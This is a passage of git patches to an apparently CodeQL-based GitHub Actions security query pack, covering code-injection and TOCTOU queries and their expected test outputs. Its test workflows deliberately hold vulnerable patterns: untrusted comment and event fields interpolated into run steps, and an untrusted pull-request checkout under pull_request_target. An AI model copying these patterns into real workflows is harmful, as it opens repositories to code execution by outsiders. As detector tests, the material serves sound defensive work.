.github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | semmle.label | needs.test1.outputs.job_output | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | @@ -254,7 +252,6 @@ nodes | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | -| action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | @@ -262,4 +259,3 @@ subpaths | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | | .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | -| action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 4b270404373..ab0a69a8fa8 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -50,7 +50,7 @@ edges | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | -| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | +| .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | @@ -183,8 +183,6 @@ nodes | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | @@ -206,7 +204,7 @@ nodes | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | -| .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | +| .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | semmle.label | github.event['comment']['body'] | | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | semmle.label | needs.test1.outputs.job_output | | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | @@ -254,7 +252,6 @@ nodes | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | -| action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | @@ -312,8 +309,6 @@ subpaths | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | ${{ github.event.issue.body }} | | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | @@ -332,8 +327,8 @@ subpaths | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/ql/test/query-tests/Security/CWE-094/action1/action.yml b/ql/test/query-tests/Security/CWE-094/action1/action.yml deleted file mode 100644 index 8bfa15b405c..00000000000 --- a/ql/test/query-tests/Security/CWE-094/action1/action.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: 'test' -description: 'test' -branding: - icon: 'test' - color: 'test' -inputs: - test: - description: test - required: false - default: 'test' -runs: - using: "composite" - steps: - - run: echo '${{ github.event.comment.body }}' From e28ad1d644e50148ec8efb43e85519658b9d88ec Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 10:28:24 +0200 Subject: [PATCH 0294/1267] Reduce FP for actor/association checks that cannot be bypassed this way --- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql | 2 +- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index c5e12c0fccc..a3fcc9e0403 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -15,7 +15,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from ControlCheck check, MutableRefCheckoutStep checkout +from LabelControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index b74c3389f9d..562fc0809b7 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -15,7 +15,7 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from ControlCheck check, MutableRefCheckoutStep checkout +from LabelControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and From 558bea84d435f7b0cd10a775c6eb65478e5bec63 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Thu, 16 May 2024 10:56:01 +0200 Subject: [PATCH 0295/1267] Create label_actor.yml --- .../CWE-367/.github/workflows/label_actor.yml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml new file mode 100644 index 00000000000..1debaecf97d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml @@ -0,0 +1,17 @@ +# Making Label gates the only ones bypassable with TOCTOU races since actor or association ones should not be bypassable +name: Label Trigger Test +on: + pull_request_target: + types: [labeled] + branches: [main] + +jobs: + integration-tests: + runs-on: ubuntu-latest + if: github.repository_owner == 'npm' && github.actor == 'dependabot[bot]' + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: bash label_example/tests.sh From 612be64ffcaa276f659bc1a4d98005d90a3e19f3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 16:10:26 +0200 Subject: [PATCH 0296/1267] Consider actor and association checks as bypassable checks ONLY for issueOps --- .../CWE-367/UntrustedCheckoutTOCTOUCritical.ql | 10 ++++++++-- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 10 ++++++++-- 2 files changed, 16 insertions(+), 4 deletions(-) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index a3fcc9e0403..b7b8a3cf956 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -15,11 +15,17 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from LabelControlCheck check, MutableRefCheckoutStep checkout +from ControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // the checked-out code may lead to arbitrary code execution - checkout.getAFollowingStep() instanceof PoisonableStep + checkout.getAFollowingStep() instanceof PoisonableStep and + ( + check instanceof LabelControlCheck + or + (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and + check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") + ) select checkout, "The checked-out code can be changed after the authorization check o step $@.", check, check.toString() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index 562fc0809b7..65887922231 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -15,11 +15,17 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from LabelControlCheck check, MutableRefCheckoutStep checkout +from ControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // there are no evidences that the checked-out code can lead to arbitrary code execution - not checkout.getAFollowingStep() instanceof PoisonableStep + not checkout.getAFollowingStep() instanceof PoisonableStep and + ( + check instanceof LabelControlCheck + or + (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and + check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") + ) select checkout, "The checked-out code can be changed after the authorization check o step $@.", check, check.toString() From dfeefe0caabc46a1676b042b9ea189fc8892e4c2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 16:17:26 +0200 Subject: [PATCH 0297/1267] Consider actor and association checks as bypassable checks ONLY for issueOps --- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql | 4 +++- ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 4 +++- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 5d501f2cea9..6b3e0628f40 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -15,15 +15,17 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from LabelControlCheck check, MutableRefCheckoutStep checkout +from ControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // the checked-out code may lead to arbitrary code execution checkout.getAFollowingStep() instanceof PoisonableStep and ( + // label gates do not depend on the triggering event check instanceof LabelControlCheck or + // actor or Association gates apply to IssueOps only (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") ) diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index e2f2b26a75c..fcf83269960 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -15,15 +15,17 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps -from LabelControlCheck check, MutableRefCheckoutStep checkout +from ControlCheck check, MutableRefCheckoutStep checkout where // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // there are no evidences that the checked-out code can lead to arbitrary code execution not checkout.getAFollowingStep() instanceof PoisonableStep and ( + // label gates do not depend on the triggering event check instanceof LabelControlCheck or + // actor or Association gates apply to IssueOps only (check instanceof AssociationControlCheck or check instanceof ActorControlCheck) and check.getEnclosingJob().getATriggerEvent().getName().matches("%_comment") ) From 47a66e10756f0d9ba4c9860b8c6e769c59baeed3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 16 May 2024 21:43:00 +0200 Subject: [PATCH 0298/1267] Add TODO --- ql/lib/codeql/actions/ast/internal/Ast.qll | 2 ++ 1 file changed, 2 insertions(+) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 5e4f078bc3a..0370b1ca4c3 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1290,6 +1290,8 @@ class MatrixAccessPathImpl extends TMatrixAccessPathNode { } private YamlMappingLikeNode resolveMatrixAccessPath( + // TODO: support `include` and `exclude` keys + // https://docs.github.com/en/actions/using-jobs/using-a-matrix-for-your-jobs#expanding-or-adding-matrix-configurations YamlMappingLikeNode root, MatrixAccessPathImpl accessPath ) { // access path contains no dots. eg: "os" From 5f8bab0608a9d2a3f460847e35cf2f45b920b868 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 17 May 2024 22:36:26 +0200 Subject: [PATCH 0299/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 7413744d3ff..b1a100a7040 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.25 +version: 0.0.26 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6bb27759f06..341b6f45c29 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.25 +version: 0.0.26 groups: - actions - queries From d3bff87f9accf334041cb821c21ad4a60fd29288 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 17 May 2024 23:10:29 +0200 Subject: [PATCH 0300/1267] Add github to json contexts --- ql/lib/codeql/actions/dataflow/FlowSources.qll | 4 ++-- .../Security/CWE-094/.github/workflows/test4.yml | 8 ++++++++ .../query-tests/Security/CWE-094/CodeInjection.expected | 2 ++ .../Security/CWE-094/PrivilegedCodeInjection.expected | 4 ++++ 4 files changed, 16 insertions(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 063a3f671a3..d9f7b14edd3 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -178,7 +178,7 @@ private predicate jsonEvent(string context) { reg = [ // json - "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", + "github", "github\\.event", "github\\.event\\.client_payload", "github\\.event\\.comment", "github\\.event\\.commits", "github\\.event\\.discussion", "github\\.event\\.head_commit", "github\\.event\\.head_commit\\.author", "github\\.event\\.head_commit\\.committer", "github\\.event\\.inputs", "github\\.event\\.issue", "github\\.event\\.merge_group", @@ -262,7 +262,7 @@ class GitHubEventJsonSource extends RemoteFlowSource { ) or contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), _) and - Utils::normalizeExpr(context).regexpMatch(".*\\bgithub.event\\b.*") + Utils::normalizeExpr(context).regexpMatch(".*\\bgithub(\\.event)?\\b.*") ) ) and flag = "json" diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml index c4380bfa8af..75bf0527ee8 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test4.yml @@ -17,3 +17,11 @@ jobs: - name: Dump GitHub issue context id: github_issue_step run: echo '${{ toJSON(github.event.issue) }}' + + - name: Dump GitHub issue context + id: github_issue_step + run: echo '${{ toJSON(github) }}' + + - name: Dump GitHub issue context + id: github_issue_step + run: echo '${{ toJSON(github.event) }}' diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index dc653a074e9..e47c6dd340c 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -229,6 +229,8 @@ nodes | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | +| .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | semmle.label | toJSON(github) | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index ab0a69a8fa8..848e08cf69e 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -229,6 +229,8 @@ nodes | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | +| .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | semmle.label | toJSON(github) | +| .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -340,6 +342,8 @@ subpaths | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | 